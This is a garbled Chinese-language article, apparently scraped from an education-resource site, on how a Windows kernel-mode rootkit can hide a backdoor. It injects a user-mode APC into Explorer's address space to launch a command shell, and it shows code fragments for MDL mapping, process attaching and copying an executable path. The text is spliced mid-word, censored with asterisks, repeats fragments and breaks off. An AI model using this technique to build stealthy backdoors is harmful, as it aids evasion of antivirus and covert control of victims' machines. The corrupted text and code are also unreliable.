浅谈Rootkit如何在内核模式实现后门隐藏.doc

浅谈Rootkit如何在内核模式实现***隐藏~教育资源库
很多人对Rootkit感兴趣,Rootkit技术已经用于很多流氓软件中,杀毒软件开始重视Rootkit。很多Rootkit所做的主要工作是在内核态做手脚来隐藏攻击者的***。那么相应就有很多检测工具来检测隐藏的进程与线程。有没有办法在Rootkit的内核模块里就实现一个完整的***,提供一个CMD出来呢?这样就免去了隐藏进程所带来的风险。
NT Rootkit试图这么做过,不知道什么原因这个功能并没有开发完成。这涉及到一个问题,如何从内核态来执行用户态代码。
关于这个话题有人很早就已经研究了,但是目前还没有成熟的、公开源码的***使用这样的技术。也许觉得这很神秘?其实不然。。
如果对odeApc(lpProcess,
pTargetThread,
pTargetProcess);
}
InstallUserModeApc原型:
CODENTSTATUS
InstallUserModeApc(
INLPSTRlpProcess,
INPKTHREADpTargetThread,
INPEPROCESSpTargetProcess);
,pTargetThread是我们的APC即将插入的线程KTHREAD指针。接着我们就为APC和映射我们代码的内存描述表(MDL)分配内存:
PRKAPCpApc=NULL;
PMDLpMdl=NULL;
ULONGdProbeAndLockPages(pMdl,KernelMode,Iodl驻留在内存中,映射到我们的用户态代码(reateProcess()。,它怎么能调用我们的APC例程呢?
KAPC_STATEApcState;
//
KeStackAttachProcess((pTargetProcess->Pcb),ApcState);
//将我们的代码物理页面映射到进程空间
pMappedAddress=
MmMapLockedPagesSpecifyCache(pMdl,
UserMode,
MmCached,
NULL,FALSE,
NormalPagePriority);
我们来看看我们的APC代码,它将映射到Explorer的进程地址空间。
将AL)压入堆栈,然后0xabcd,然后call。0xabcd是apLockedPagesSpecifyCache(pMdl,
UserMode,
MmCached,
NULL,FALSE,
NormalPagePriority);
demset((unsignedchar*)pMappedAddress+0x14,0,300);
//CopylpProcess,即我们要执行的exe文件地址的字符串,到映射的内存空间
memcpy((unsignedchar*)pMappedAddress+0x14,
lpPro